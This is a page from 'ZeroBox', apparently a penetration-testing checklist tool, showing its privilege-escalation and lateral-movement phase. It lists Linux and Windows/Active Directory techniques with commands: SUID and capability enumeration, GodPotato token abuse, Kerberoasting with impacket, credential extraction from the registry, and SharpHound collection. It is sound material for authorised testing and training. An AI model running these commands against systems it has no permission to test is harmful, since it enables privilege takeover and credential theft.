ZeroBox

Phase 07: Privilege Escalation & Lateral Movement

Exploit system misconfigurations, abuse Active Directory access rights, or escalate privileges to achieve full administrative control. This phase has 11 checklist items. Placeholders such as {TARGET_IP} are values for your target.

Branch F: Linux Privilege Escalation Playbook

Sudo Capabilities & Permissions Check (sudo -l)

Check binaries allowed to run as root with or without password; cross-reference GTFOBins.

sudo -l

SUID / SGID Binary Discovery & GTFOBins Exploitation

Search for binaries running with root effective UID.

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

Linux Binary Capabilities (getcap)

Audit dangerous capabilities like cap_setuid, cap_dac_read_search, or cap_sys_admin.

getcap -r / 2>/dev/null

Writable Cron Script or Wildcard Injection Abuse

Hijack cron scripts or exploit tar/rsync wildcard command execution.

cat /etc/crontab; ps -ef | grep cron

Writable Sensitive Files (/etc/passwd, /etc/shadow)

Write a new root user entry with custom crypted password hash if /etc/passwd is writable.

ls -l /etc/passwd /etc/shadow

Kernel Exploitation (PwnKit, DirtyPipe) [Verified Option]

Cross-reference kernel release against stable local privilege escalation exploits.

uname -a

Branch G: Windows & Active Directory PrivEsc Playbook

Token Privileges Abuse (SeImpersonate, SeBackupPrivilege)

Abuse impersonation privileges via PrintSpoofer, GodPotato, or JuicyPotato.

whoami /priv; GodPotato-NET4.exe -cmd "cmd.exe /c whoami"

Stored Credentials, DPAPI & Registry AutoLogon

Extract saved RDP credentials, RunAs records, or plaintext autologon passwords.

cmdkey /list or reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Service Exploitation (Unquoted Paths, Weak ACLs)

Replace writable binary paths or hijack unquoted executable spaces.

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\"

Active Directory Kerberoasting & AS-REP Roasting

Request service ticket TGS hashes and crack offline with hashcat.

impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {DC_IP} -request

BloodHound Path Exploration & Attack Chains

Collect domain graph and uncover shortest path to Domain Admins or DCSync rights.

.\SharpHound.exe -c All --zipfilename loot.zip

All phases

  1. Host Discovery & Surface Mapping
  2. Protocol & Service Enumeration
  3. Vulnerability Identification & Threat Modeling
  4. Foothold Execution & Initial Access
  5. Shell Stabilization & Context Triage
  6. Internal System & Network Reconnaissance
  7. Privilege Escalation & Lateral Movement
  8. Post-Exploitation, Flag Vault & Artifact Collection

Tick items off per machine. ZeroBox tracks checklist progress for every target. Open the methodology checklist